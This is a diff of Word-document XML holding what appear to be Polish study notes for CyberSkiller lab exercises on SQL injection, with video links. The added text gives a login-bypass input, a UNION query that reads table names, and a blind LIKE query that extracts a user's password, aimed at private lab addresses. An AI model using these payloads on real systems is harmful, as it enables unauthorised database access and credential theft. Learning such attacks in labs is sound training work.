+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -973,52 +2331,2987 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Klasyczna podatność SQL Injection </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Odczyt schematu bazy danych </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Podatność SQL Injection typu Blind </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Klasyczna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>podatność</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SQL Injection </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId23" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/3mpgwnGc4Q4</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">login: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>CyberSkiller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>dowolny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>znak</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] (po </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>loginie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wpisujemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘”’(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cudzysłow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>lub</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>apostrof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>) + [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>spacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] + “--” + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>spacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>dowolny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>znak</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>dowolny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>znak</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>bo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>czasem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> w </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>formularzach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>walidacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>nie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>pozwala</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>pisac</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>bialego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>znaku</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>koncu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>spacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>]--[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>spacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] to jest </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>komentarz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> w </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zapytaniach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Odczyt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>schematu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bazy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>danych</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId24" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/j3v2oMuK3kc</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">10.0.56.171/?query=" </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">union </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>information_schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -- a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Podatność</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>typu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Blind </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/6tFDstB0s6w</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>10.0.58.55/?query=XXXX" union select password from users where username = '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>CyberSkiller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' and password like 'C%' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (XXX – to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>jakis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>tekst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>bo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>nie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wiemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> w </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>którym</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>momencie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>odcinanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Podatność SQL Injection typu Time Based </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Podgląd nagłówków odpowiedzi </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId22" w:history="1">
+        <w:t xml:space="preserve">jest </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zapytanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> po </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>pierwszym</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘”’. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Wtedy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>mamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>pewność</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>że</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
